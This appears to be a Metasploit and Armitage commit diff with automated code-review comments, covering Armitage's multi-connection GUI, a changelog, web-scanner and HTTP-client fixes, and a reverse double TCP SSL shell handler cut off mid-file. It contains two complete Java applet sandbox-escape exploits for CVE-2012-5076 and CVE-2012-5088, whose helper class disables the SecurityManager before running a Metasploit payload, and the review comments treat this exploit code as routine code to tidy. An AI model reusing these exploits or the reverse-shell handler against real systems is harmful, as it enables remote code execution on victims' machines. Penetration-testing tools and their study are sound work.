}
}
public boolean dispatchKeyEvent(KeyEvent ev) {
if (active != null) {
return active.getBindings().dispatchKeyEvent(ev);
}
return false;
}
public static final void setupLookAndFeel() {
try {
for (UIManager.LookAndFeelInfo info : UIManager.getInstalledLookAndFeels()) {
if ("Nimbus".equals(info.getName())) {
UIManager.setLookAndFeel(info.getClassName());
break;
}
}
}
catch (Exception e) {
}
}
public void closeConnect() {
synchronized (buttons) {
if (buttons.size() == 0) {
System.exit(0);
}
}
}
public void quit() {
synchronized (buttons) {
ArmitageInstance temp = null;
content.remove(active);
Iterator i = buttons.iterator();
while (i.hasNext()) {
temp = (ArmitageInstance)i.next();
if (temp.app == active) {
toolbar.remove(temp.button);
i.remove();
break;
}
}
if (buttons.size() == 0) {
System.exit(0);
}
else if (buttons.size() == 1) {
remove(toolbar);
validate();
}
if (i.hasNext()) {
temp = (ArmitageInstance)i.next();
}
else {
temp = (ArmitageInstance)buttons.getFirst();
}
set(temp.button);
}
}
public MultiFrame() {
super("");
setLayout(new BorderLayout());
/* setup our toolbar */
toolbar = new JToolBar();
/* content area */
content = new JPanel();
cards = new CardLayout();
content.setLayout(cards);
/* setup our stuff */
add(content, BorderLayout.CENTER);
/* buttons?!? :) */
buttons = new LinkedList();
/* do this ... */
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
/* some basic setup */
setSize(800, 600);
setExtendedState(JFrame.MAXIMIZED_BOTH);
/* all your keyboard shortcuts are belong to me */
KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(this);
}
protected void set(JToggleButton button) {
synchronized (buttons) {
/* set all buttons to the right state */
Iterator i = buttons.iterator();
while (i.hasNext()) {
ArmitageInstance temp = (ArmitageInstance)i.next();
if (temp.button.getText().equals(button.getText())) {
temp.button.setSelected(true);
active = temp.app;
setTitle(active.getTitle());
}
else {
temp.button.setSelected(false);
}
}
/* show our cards? */
cards.show(content, button.getText());
active.touch();
}
}
public void addButton(String title, final ArmitageApplication component, RpcConnection conn) {
synchronized (buttons) {
final ArmitageInstance a = new ArmitageInstance();
a.button = new JToggleButton(title);
a.button.setToolTipText(title);
a.app = component;
a.client = conn;
a.button.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent ev) {
set((JToggleButton)ev.getSource());
}
});
a.button.addMouseListener(new MouseAdapter() {
public void check(MouseEvent ev) {
if (ev.isPopupTrigger()) {
final JToggleButton source = a.button;
JPopupMenu popup = new JPopupMenu();
JMenuItem rename = new JMenuItem("Rename");
rename.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent ev) {
String name = JOptionPane.showInputDialog("Rename to?", source.getText());
if (name != null) {
content.remove(component);
content.add(component, name);
source.setText(name);
set(source);
}
}
});
popup.add(rename);
popup.show((JComponent)ev.getSource(), ev.getX(), ev.getY());
ev.consume();
}
}
public void mouseClicked(MouseEvent ev) {
check(ev);
}
public void mousePressed(MouseEvent ev) {
check(ev);
}
public void mouseReleased(MouseEvent ev) {
check(ev);
}
});
toolbar.add(a.button);
content.add(component, title);
buttons.add(a);
set(a.button);
if (buttons.size() == 1) {
show();
}
else if (buttons.size() == 2) {
add(toolbar, BorderLayout.SOUTH);
}
validate();
}
}
}
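Review bot: every lookup in `MultiFrame` is keyed by the button's text (`getClients`, `set`, `cards.show(content, button.getText())`, and `content.add(component, name)` in the rename handler), so renaming a second connection to an existing name silently collides: `getClients` returns one client for both and `CardLayout` shows the first card registered under that name. Keep a stable id per `ArmitageInstance` for the card name and map key and use the text only for display. Also, `quit()` calls `content.remove(active)` without checking `active` for null, and `show()` on a `JFrame` is deprecated in favour of `setVisible(true)`.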

View File

@ -54,6 +54,8 @@ public class ZoomableImage extends JLabel {
check(ev);
}
});
setHorizontalAlignment(SwingConstants.CENTER);
}
protected void updateIcon() {

View File

@ -1,6 +1,55 @@
Armitage Changelog
==================
12 Feb 13 (tested against msf 16438)
---------
- Fixed a corner case preventing the display of removed host labels
when connected to a team server.
- Fixed RPC call cache corruption in team server mode. This bug could
lead to some exploits defaulting to a shell payload when meterpreter
was a possibility.
- Slight optimization to some DB queries. I no longer pull unused
fields making the query marginally faster. Team server is more
efficient too as changes to unused fields won't force data (re)sync.
- Hosts -> Clear Database now clears host labels too.
- Added the ability to manage multiple team server instances through
Armitage. Go to Armitage -> New Connection to connect to another
server. A button bar will appear that allows you to switch active
Armitage connections.
- Credentials available across instances are pooled when using
the [host] -> Login menu and the credential helper.
- Rewrote the event log management code in the team server
- Added nickname tab completion to event log. I feel like I'm writing
an IRC client again.
- Hosts -> Clear Database now asks you to confirm the action.
- Hosts -> Import Hosts announces successful import to event log again.
23 Jan 13 (tested against msf 16351)
---------
- Added helpers to set EXE::Custom and EXE::Template options.
- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
check if a proxy server is up was deadlock prone. Removed it.
- Starting SOCKS Proxy module now opens a tab displaying the module
start process. An event is posted to the event log too.
- Created an option helper to select credentials for SMBUser, SMBPass,
USERNAME, and PASSWORD.
- Added a feature to label hosts. A label will show up in its own column
in table view or below all info in graph view. Any team member may
change a label through [host] -> host -> Set Label. You may also use
dynamic workspaces to show hosts with certain labels attached.
- Fixed bad things happening when connecting Armitage to 'localhost' and
not '127.0.0.1'.
- Screenshots and Webcam shots are now centered in their tab.
- Added an alternate .bat file to start msfrpcd on Windows in the
Metasploit 4.5 installer's environment.
- Added a color-style for [!] warning messages
Cortana Updates (for scripters)
--------
- &handler function now works as advertised.
- Cortana now avoids use of core.setg
4 Jan 13 (tested against msf 16252)
--------
- Added a helper to set REXE option

View File

@ -0,0 +1,19 @@
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B
implements PrivilegedExceptionAction
{
public B()
{
try
{
AccessController.doPrivileged(this); } catch (Exception e) {
}
}
public Object run() {
System.setSecurityManager(null);
return new Object();
}
}

View File

@ -0,0 +1,78 @@
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;
import com.sun.org.glassfish.external.statistics.impl.*;
public class Exploit extends Applet
{
public static MethodHandles.Lookup test0;
public Exploit()
{
}
public void init()
{
try
{
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buffer = new byte[8192];
int length;
// read in the class file from the jar
InputStream is = getClass().getResourceAsStream("B.class");
// and write it out to the byte array stream
while( ( length = is.read( buffer ) ) > 0 )
bos.write( buffer, 0, length );
// convert it to a simple byte array
buffer = bos.toByteArray();
Class c = Class.forName("java.lang.invoke.MethodHandles");
Method m = c.getMethod("lookup", new Class[0]);
AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0);
MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]);
MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0);
Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
// Instance of sun.org.mozilla.javascript.internal.Context
MethodType localMethodType1 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle1 = test.findConstructor(localClass1, localMethodType1);
Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]);
// Context.createClassLoader
MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class);
MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2);
Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null });
// GeneratedClassLoader.defineClass
MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3);
Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer });
//New instance of the helper Class
localClass3.newInstance();
Payload.main(null);
//Runtime.getRuntime().exec("calc.exe");
}
catch(Throwable ex)
{
//ex.printStackTrace();
}
}
}
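Review bot: `Exploit.java` imports `IOException`, `ObjectInputStream` and `ObjectOutputStream` and declares `public static MethodHandles.Lookup test0`, none of which are used; the `InputStream` from `getResourceAsStream("B.class")` is never closed, and `catch(Throwable ex)` with its only statement commented out hides every failure. Dropping the dead imports and field, closing the stream in a `finally`, and a comment explaining why exceptions are swallowed would make the file easier to maintain.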

View File

@ -0,0 +1,18 @@
# rt.jar must be in the classpath!
CLASSES = \
Exploit.java \
B.java
.SUFFIXES: .java .class
.java.class:
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
all: $(CLASSES:.java=.class)
install:
mv Exploit.class ../../../../data/exploits/cve-2012-5076_2/
mv B.class ../../../../data/exploits/cve-2012-5076_2/
clean:
rm -rf *.class
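Review bot: the Makefile compiles with `-source 1.2 -target 1.2` while `Exploit.java` depends on `java.lang.invoke` and `com.sun.org.glassfish.external.statistics.impl`, which only ship with JDK 7; the comment "rt.jar must be in the classpath!" hints at that, so state the required JDK explicitly. `install` uses `mv`, which removes the build output so a second `make install` fails until `make all` is rerun; `cp` is the more usual choice, and `rm -rf *.class` can be `rm -f`.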

external/source/exploits/cve-2012-5088/B.java vendored Executable file
View File

@ -0,0 +1,19 @@
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B
implements PrivilegedExceptionAction
{
public B()
{
try
{
AccessController.doPrivileged(this); } catch (Exception e) {
}
}
public Object run() {
System.setSecurityManager(null);
return new Object();
}
}
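Review bot: this `B.java` is identical to `external/source/exploits/cve-2012-5076_2/B.java` added in the same commit; keeping a single copy, or at least a comment naming the canonical one, avoids the two drifting apart.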

View File

@ -0,0 +1,66 @@
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;
public class Exploit extends Applet
{
public Exploit()
{
}
public void init()
{
try
{
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buffer = new byte[8192];
int length;
// read in the class file from the jar
InputStream is = getClass().getResourceAsStream("B.class");
// and write it out to the byte array stream
while( ( length = is.read( buffer ) ) > 0 )
bos.write( buffer, 0, length );
// convert it to a simple byte array
buffer = bos.toByteArray();
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0);
Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
localClass3.newInstance();
Payload.main(null);
//Runtime.getRuntime().exec("calc.exe");
}
catch(Throwable ex)
{
//ex.printStackTrace();
}
}
}
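Review bot: the `IOException`, `ObjectInputStream` and `ObjectOutputStream` imports are unused, the `InputStream` returned by `getResourceAsStream("B.class")` is never closed, and `catch(Throwable ex)` swallows everything with its only statement commented out; the read-resource-into-byte-array prologue is also repeated in the `cve-2012-5076_2` applet and could live in one shared helper class next to `B.java`.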

View File

@ -0,0 +1,16 @@
CLASSES = \
Exploit.java \
B.java
.SUFFIXES: .java .class
.java.class:
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
all: $(CLASSES:.java=.class)
install:
mv Exploit.class ../../../../data/exploits/cve-2012-5088/
mv B.class ../../../../data/exploits/cve-2012-5088/
clean:
rm -rf *.class

View File

@ -260,7 +260,8 @@ public abstract class RpcConnection {
// Don't fork cause we'll check if it dies
String rpcType = "Basic";
java.util.List args = new java.util.ArrayList(java.util.Arrays.asList(new String[]{
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1"}));
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1",
"-p",Integer.toString(defaultPort)}));
if(!defaultSsl)
args.add("-S");
if(disableDb)

View File

@ -50,7 +50,8 @@ module Auxiliary::Login
\n\*$ |
(Login ?|User ?)(name|): |
^\s*\<[a-f0-9]+\>\s*$ |
^\s*220.*FTP
^\s*220.*FTP|
not\ allowed\ to\ log\ in
)/mix
@waiting_regex = /(?:

View File

@ -250,7 +250,9 @@ module Auxiliary::Web
if !(payload = opts[:payload])
if payloads
payload = payloads.select{ |p| element.altered_value.include?( p ) }.first
payload = payloads.select { |p|
element.altered_value.include?( p )
}.sort_by { |p| p.size }.last
end
end

View File

@ -101,7 +101,7 @@ module Analysis::Differential
# save the response and some data for analysis
responses[:good][elem.altered] << {
'res' => res,
'elem' => elem
'elem' => elem.dup
}
end
end
@ -122,8 +122,7 @@ module Analysis::Differential
http.if_not_custom_404( action, res['res'].body ) do
# if this isn't a custom 404 page then it means that
# the element is vulnerable, so go ahead and log the issue
fuzzer.process_vulnerability( res['elem'], 'Manipulatable responses.',
:payload => res['elem'].altered_value )
fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.' )
end
end
end
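Review bot: the new `process_vulnerability( res['elem'], 'Boolean manipulation.' )` call drops the `:payload => res['elem'].altered_value` option, so the reported vulnerability no longer records which input triggered it; since `res['elem']` is now a `dup` (hunk above) its `altered_value` is preserved, so either keep passing it or say in the commit message why it was removed.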

View File

@ -54,7 +54,8 @@ module Analysis::Timing
timeout = opts[:delay]
seed = p.altered_value.dup
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.first
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.
sort_by { |p2| p2.size }.last
# 1st pass, make sure the webapp is responsive
if_responsive do
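Review bot: `select { ... }.sort_by { |p| p.size }.last` is now duplicated here and in the `Auxiliary::Web` hunk above; `select { ... }.max_by(&:size)` expresses "longest matching payload" directly, and pulling it into one helper on the fuzzer keeps the two call sites from drifting apart.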

View File

@ -120,10 +120,15 @@ class Auxiliary::Web::HTTP
tl = []
loop do
# Spawn threads for each host
while tl.size <= (opts[:max_threads] || 5) && !@queue.empty? && (req = @queue.pop)
tl << framework.threads.spawn( "#{self.class.name} - #{req})", false, req ) do |request|
request.handle_response request( request.url, request.opts )
# Keep callback failures isolated.
begin
request.handle_response request( request.url, request.opts )
rescue => e
elog e.to_s
e.backtrace.each { |l| elog l }
end
end
end
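Review bot: `rescue => e` around `handle_response` catches only `StandardError`, which is the right scope, but `elog e.to_s` loses the exception class; `elog "#{e.class}: #{e.message}"` keeps it, and the same log-and-backtrace pattern is repeated in `_request` below, so a small shared helper would serve both.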
@ -261,10 +266,12 @@ class Auxiliary::Web::HTTP
end
def _request( url, opts = {} )
body = opts[:body]
body = opts[:body]
timeout = opts[:timeout] || 10
method = opts[:method].to_s.upcase || 'GET'
url = url.is_a?( URI ) ? url : URI( url.to_s )
method = opts[:method].to_s.upcase || 'GET'
url = url.is_a?( URI ) ? url : URI( url.to_s )
rex_overrides = opts.delete( :rex ) || {}
param_opts = {}
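Review bot: the re-aligned line `method = opts[:method].to_s.upcase || 'GET'` keeps an existing bug: `to_s.upcase` never returns nil, so the `|| 'GET'` default is dead and a request without `:method` is sent with an empty method string. Since the line was touched anyway, `method = (opts[:method] || 'GET').to_s.upcase` fixes it.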
@ -280,10 +287,11 @@ class Auxiliary::Web::HTTP
end
opts = @request_opts.merge( param_opts ).merge(
'uri' => url.path || '/',
'method' => method,
'uri' => url.path || '/',
'method' => method,
'headers' => headers.merge( opts[:headers] || {} )
)
# Allow for direct rex overrides
).merge( rex_overrides )
opts['data'] = body if body
@ -291,7 +299,12 @@ class Auxiliary::Web::HTTP
Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout )
rescue ::Timeout::Error
Response.timed_out
rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
#rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
# This is bad but we can't anticipate the gazilion different types of network
# i/o errors between Rex and Errno.
rescue => e
elog e.to_s
e.backtrace.each { |l| elog l }
Response.empty
end
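Review bot: the old `rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout` line is kept as a comment above the new `rescue => e`; delete the commented-out code and keep only the explanatory comment. Note that `rescue => e` also turns programming errors such as `NoMethodError` into `Response.empty`, which the log line makes diagnosable but which may hide bugs during testing.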

View File

@ -71,7 +71,7 @@ module Auxiliary::WmapModule
else
res << datastore['VHOST']
end
res << ":" + wmap_target_port
res << ":" + wmap_target_port.to_s
res
end

View File

@ -679,8 +679,8 @@ class DBManager
# In the case of multi handler we cannot yet determine the true
# exploit responsible. But we can at least show the parent versus
# just the generic handler:
if session and session.via_exploit == "exploit/multi/handler"
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
end
s = ::Mdm::Session.new(sess_data)
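Review bot: `session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']` is now repeated three times in this file (here, in the `mod_fullname` branch and in the `via_exploit` branch below); a small helper returning the ParentModule name or nil would remove the duplication and keep the three checks identical.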
@ -696,9 +696,9 @@ class DBManager
mod = framework.modules.create(session.via_exploit)
if session.via_exploit == "exploit/multi/handler"
mod_fullname = sess_data[:datastore]['ParentModule']
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
mod_fullname = sess_data[:datastore]['ParentModule']
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
else
mod_name = mod.name
mod_fullname = mod.fullname
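Review bot: `::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name` still raises NoMethodError on nil when the module cache has not been built yet or the ParentModule name is not in it; the new guard only covers a missing ParentModule value. Assign the lookup to a local and fall back to the `else` branch (`mod.name` / `mod.fullname`) when it returns nil, so an incomplete cache degrades to the generic handler name instead of aborting session reporting.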
@ -720,7 +720,7 @@ class DBManager
vuln = framework.db.report_vuln(vuln_info)
if session.via_exploit == "exploit/multi/handler"
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
via_exploit = sess_data[:datastore]['ParentModule']
else
via_exploit = session.via_exploit

View File

@ -22,7 +22,9 @@ module Exploit::FileDropper
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
# read-only flag with a command.
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
if session.platform =~ /win/
session.shell_command_token(%Q|attrib.exe -r #{win_file}|)
end
session.fs.file.rm(file)
print_good("Deleted #{file}")
true
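Review bot: the rewritten `attrib.exe -r #{win_file}` drops the double quotes the old line had around the path, so any file under a directory with spaces (for example under `Program Files`) will not have its read-only flag cleared and the following `session.fs.file.rm(file)` can fail. Keep `%Q|attrib.exe -r "#{win_file}"|`; the new `if session.platform =~ /win/` guard is the right fix on its own and does not need the quoting change.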

View File

@ -26,11 +26,13 @@ module Exploit::Remote::FtpServer
], Msf::Exploit::Remote::FtpServer)
end
# (see Msf::Exploit#setup)
def setup
super
@state = {}
end
# (see TcpServer#on_client_connect)
def on_client_connect(c)
@state[c] = {
:name => "#{c.peerhost}:#{c.peerport}",
@ -46,6 +48,25 @@ module Exploit::Remote::FtpServer
c.put "220 FTP Server Ready\r\n"
end
# Dispatches client requests to command handlers.
#
# Handlers should be named +on_client_command_*+, ending with a
# downcased FTP verb, e.g. +on_client_command_user+. If no handler
# exists for the given command, returns a generic default response.
#
# @example Handle SYST requests
# class Metasploit4 < Msf::Exploit
# include Msf::Exploit::Remote::FtpServer
# ...
# def on_client_command_syst(cmd_conn, arg)
# print_status("Responding to SYST request")
# buf = build_exploit_buffer(cmd_conn)
# cmd_conn.put("215 Unix Type: #{buf}\r\n")
# end
# end
#
# @param (see TcpServer#on_client_data)
# @return (see TcpServer#on_client_data)
def on_client_data(c)
data = c.get_once
return if not data
@ -184,6 +205,15 @@ module Exploit::Remote::FtpServer
end
# Create a socket for the protocol data, either PASV or PORT,
# depending on the client.
#
# @see http://tools.ietf.org/html/rfc3659 RFC 3659
# @see http://tools.ietf.org/html/rfc959 RFC 959
# @param c [Socket] Control connection socket
#
# @return [Socket] A connected socket for the data connection
# @return [nil] on failure
def establish_data_connection(c)
begin
Timeout.timeout(20) do

View File

@ -536,20 +536,21 @@ module Exploit::Remote::HttpClient
end
#
# Make sure the URI starts with a slash and doesn't end with one
# Returns a modified version of the URI that:
# 1. Always has a starting slash
# 2. Removes all the double slashes
#
def normalize_uri(str)
def normalize_uri(*strs)
new_str = strs * "/"
unless str.to_s[0,1] == "/"
str = "/" + str.to_s
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
str = str.gsub(/^\/+/, '/')
unless str.length == 1
str = str.gsub(/\/+$/, '')
end
str
new_str
end
#
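Review bot: two behaviour changes here are not called out in the new doc comment: the old version stripped trailing slashes (`/foo/` became `/foo`) and the new one keeps them, so callers that append their own `/x` to the result will get double slashes again; and `strs * "/"` joins `nil` elements as empty strings, so `normalize_uri(nil, 'a')` yields `/a` without complaint. On the implementation, `new_str = new_str.gsub!("//", "/") while new_str.index("//")` only works because the loop condition guarantees a match (otherwise `gsub!` returns nil and would clobber `new_str`); `new_str = new_str.squeeze('/')` does the same collapse in one call and has no such trap.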

View File

@ -28,7 +28,7 @@ module Exploit::Remote::Web
super
register_options([
OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ),
OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ),
OptString.new( 'GET', [ false, "GET parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
OptString.new( 'POST', [ false, "POST parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
@ -75,14 +75,21 @@ module Exploit::Remote::Web
def exploit
print_status "Sending HTTP request for #{path}"
if res = perform_request
print_status "The server responded with HTTP status code #{res.code}."
else
print_status 'The server did not respond to our request.'
end
res = perform_request
if res
print_status "The server responded with HTTP status code #{res.code}."
else
print_status 'The server did not respond to our request.'
end
handler
end
def tries
1
end
private
def perform_request
send_request_cgi({
'global' => true,
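Review bot: the new `tries` method returns a bare `1` with no comment saying what it overrides or which caller consumes it, so a reader cannot tell whether returning a different value is safe. Add a one-line comment naming the caller and why a single attempt is correct for this mixin. The `res = perform_request` / `if res` split is a readability improvement over the old assignment-in-condition and reads fine.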

View File

@ -0,0 +1,300 @@
# -*- coding: binary -*-
module Msf
module Handler
###
#
# This module implements the reverse double TCP handler. This means
# that it listens on a port waiting for a two connections, one connection
# is treated as stdin, the other as stdout.
#
# This handler depends on having a local host and port to
# listen on.
#
###
module ReverseTcpDoubleSSL
include Msf::Handler
#
# Returns the string representation of the handler type, in this case
# 'reverse_tcp_double'.
#
def self.handler_type
return "reverse_tcp_double_ssl"
end
#
# Returns the connection-described general handler type, in this case
# 'reverse'.
#
def self.general_handler_type
"reverse"
end
#
# Initializes the reverse TCP handler and ads the options that are required
# for all reverse TCP payloads, like local host and local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LHOST,
Opt::LPORT(4444)
], Msf::Handler::ReverseTcpDoubleSSL)
register_advanced_options(
[
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
], Msf::Handler::ReverseTcpDoubleSSL)
self.conn_threads = []
end
#
# Starts the listener but does not actually attempt
# to accept a connection. Throws socket exceptions
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
end
self.listener_sock = Rex::Socket::TcpServer.create(
# 'LocalHost' => datastore['LHOST'],
'LocalPort' => datastore['LPORT'].to_i,
'Comm' => comm,
'SSL' => true,
'Context' =>
{
'Msf' => framework,
'MsfPayload' => self,
'MsfExploit' => assoc_exploit
})
end
#
# Closes the listener socket if one was created.
#
def cleanup_handler
stop_handler
# Kill any remaining handle_connection threads that might
# be hanging around
conn_threads.each { |thr|
thr.kill
}
end
#
# Starts monitoring for an inbound connection.
#
def start_handler
self.listener_thread = framework.threads.spawn("ReverseTcpDoubleSSLHandlerListener", false) {
sock_inp = nil
sock_out = nil
print_status("Started reverse double handler")
begin
# Accept two client connection
begin
client_a = self.listener_sock.accept
print_status("Accepted the first client connection...")
client_b = self.listener_sock.accept
print_status("Accepted the second client connection...")
sock_inp, sock_out = detect_input_output(client_a, client_b)
rescue
wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
return nil
end
# Increment the has connection counter
self.pending_connections += 1
# Start a new thread and pass the client connection
# as the input and output pipe. Client's are expected
# to implement the Stream interface.
conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy|
begin
chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp_copy, sock_out_copy)
handle_connection(chan.lsock)
rescue
elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}")
end
}
end while true
}
end
#
# Accept two sockets and determine which one is the input and which
# is the output. This method assumes that these sockets pipe to a
# remote shell, it should overridden if this is not the case.
#
def detect_input_output(sock_a, sock_b)
begin
# Flush any pending socket data
sock_a.get_once if sock_a.has_read_data?(0.25)
sock_b.get_once if sock_b.has_read_data?(0.25)
etag = Rex::Text.rand_text_alphanumeric(16)
echo = "echo #{etag};\n"
print_status("Command: #{echo.strip}")
print_status("Writing to socket A")
sock_a.put(echo)
print_status("Writing to socket B")
sock_b.put(echo)
print_status("Reading from sockets...")
resp_a = ''
resp_b = ''
if (sock_a.has_read_data?(1))
print_status("Reading from socket A")
resp_a = sock_a.get_once
print_status("A: #{resp_a.inspect}")
end
if (sock_b.has_read_data?(1))
print_status("Reading from socket B")
resp_b = sock_b.get_once
print_status("B: #{resp_b.inspect}")
end
print_status("Matching...")
if (resp_b.match(etag))
print_status("A is input...")
return sock_a, sock_b
else
print_status("B is input...")
return sock_b, sock_a
end
rescue ::Exception
print_status("Caught exception in detect_input_output: #{$!}")
end
end
#
# Stops monitoring for an inbound connection.
#
def stop_handler
# Terminate the listener thread
if (self.listener_thread and self.listener_thread.alive? == true)
self.listener_thread.kill
self.listener_thread = nil
end
if (self.listener_sock)
self.listener_sock.close
self.listener_sock = nil
end
end
protected
attr_accessor :listener_sock # :nodoc:
attr_accessor :listener_thread # :nodoc:
attr_accessor :conn_threads # :nodoc:
module TcpReverseDoubleSSLChannelExt
attr_accessor :localinfo
attr_accessor :peerinfo
end
###
#
# This class wrappers the communication channel built over the two inbound
# connections, allowing input and output to be split across both.
#
###
class TcpReverseDoubleSSLSessionChannel
include Rex::IO::StreamAbstraction
def initialize(framework, inp, out)
@framework = framework
@sock_inp = inp
@sock_out = out
initialize_abstraction
self.lsock.extend(TcpReverseDoubleSSLChannelExt)
self.lsock.peerinfo = @sock_inp.getpeername[1,2].map{|x| x.to_s}.join(":")
self.lsock.localinfo = @sock_inp.getsockname[1,2].map{|x| x.to_s}.join(":")
monitor_shell_stdout
end
#
# Funnel data from the shell's stdout to +rsock+
#
# +StreamAbstraction#monitor_rsock+ will deal with getting data from
# the client (user input). From there, it calls our write() below,
# funneling the data to the shell's stdin on the other side.
#
def monitor_shell_stdout
# Start a thread to pipe data between stdin/stdout and the two sockets
@monitor_thread = @framework.threads.spawn("ReverseTcpDoubleSSLHandlerMonitor", false) {
begin
while true
# Handle data from the server and write to the client
